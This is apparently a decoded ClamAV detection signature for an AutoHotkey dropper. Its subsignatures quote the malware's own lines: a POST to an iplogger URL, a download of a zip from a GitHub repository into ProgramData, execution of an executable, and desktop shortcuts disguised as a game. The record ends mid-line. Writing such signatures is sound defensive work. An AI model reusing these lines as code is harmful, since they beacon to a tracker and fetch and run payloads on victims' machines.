VIRUS NAME: Win.Dropper.Autohk-7397790-0
TDB: Engine:51-255,Target:1
LOGICAL EXPRESSION: (0|1|2|3|4)>3,4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
p.open "POST","https://iplogger.com/1taL37",False
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
UrlDownloadToFile, https://github.com/Vdocss/mysoft4/raw/master/game1.zip, C:\ProgramData\Games\game1.zip
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
FileCreateShortcut, C:\ProgramData\Games\1.exe, %A_Desktop%\Vikings War of Clans.lnk
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Run, C:\ProgramData\game10.exe,, UseErrorLevel
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
FileCreateShortcut, C:\ProgramData\Games\3.exe, %A_Desktop%\
